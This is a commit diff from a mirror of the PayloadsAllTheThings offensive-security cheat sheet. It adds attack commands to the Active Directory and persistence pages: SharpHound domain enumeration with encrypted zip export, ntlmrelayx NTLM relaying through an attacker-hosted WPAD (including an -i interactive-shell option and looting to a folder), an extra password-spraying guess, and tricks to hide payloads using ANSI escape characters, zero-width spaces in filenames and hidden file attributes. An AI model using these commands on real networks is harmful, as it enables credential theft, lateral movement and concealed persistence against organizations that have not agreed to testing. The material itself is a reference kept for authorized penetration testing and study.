mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
BloodHound ZIP + Zero Width space tip
This commit is contained in:
parent
590b7681e4
commit
be0397fa68
@ -77,6 +77,8 @@
|
||||
SharpHound.exe (from resources/Ingestor)
|
||||
SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
|
||||
SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100
|
||||
SharpHound.exe -c all -d active.htb -SearchForest
|
||||
SharpHound.exe --EncryptZip --ZipFilename export.zip
|
||||
or
|
||||
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
|
||||
or
|
||||
@ -112,6 +114,7 @@
|
||||
# -wh: Server hosting WPAD file (Attacker’s IP)
|
||||
# -t: Target (You cannot relay credentials to the same device that you’re spoofing)
|
||||
# -i: open an interactive shell
|
||||
ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access
|
||||
```
|
||||
|
||||
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
|
||||
@ -540,7 +543,7 @@ Password spraying refers to the attack method that takes a large number of usern
|
||||
|
||||
Most of the time the best passwords to spray are :
|
||||
|
||||
- Password123, mimikatz
|
||||
- P@ssw0rd01, Password123, mimikatz
|
||||
- Welcome1/Welcome01
|
||||
- $Companyname1 : $Microsoft1
|
||||
- SeasonYear : Winter2019*,Spring2020!,Summer2018?
|
||||
@ -936,9 +939,9 @@ cme smb $hosts --gen-relay-list relay.txt
|
||||
mitm6 -i eth0 -d $domain
|
||||
|
||||
# spoofing WPAD and relaying NTLM credentials
|
||||
http://ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
|
||||
ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
|
||||
or
|
||||
http://ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug
|
||||
ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug
|
||||
```
|
||||
|
||||
#### Drop the MIC
|
||||
|
@ -137,10 +137,16 @@ Add an ssh key into the `~/.ssh` folder.
|
||||
|
||||
Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload.
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
#[2J[2J[2J[2H[2A# Do not remove. Generated from /etc/issue.conf by configure.
|
||||
```
|
||||
|
||||
Hide in plain sight using zero width spaces in filename.
|
||||
|
||||
```powershell
|
||||
touch $(echo -n 'index\u200D.php') index.php
|
||||
```
|
||||
|
||||
Clear the last line of the history.
|
||||
|
||||
```bash
|
||||
|
@ -21,6 +21,12 @@
|
||||
|
||||
## Userland
|
||||
|
||||
Set a file as hidden
|
||||
|
||||
```powershell
|
||||
attrib +h c:\autoexec.bat
|
||||
```
|
||||
|
||||
### Registry
|
||||
|
||||
Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.
|
||||
|
Loading…
Reference in New Issue
Block a user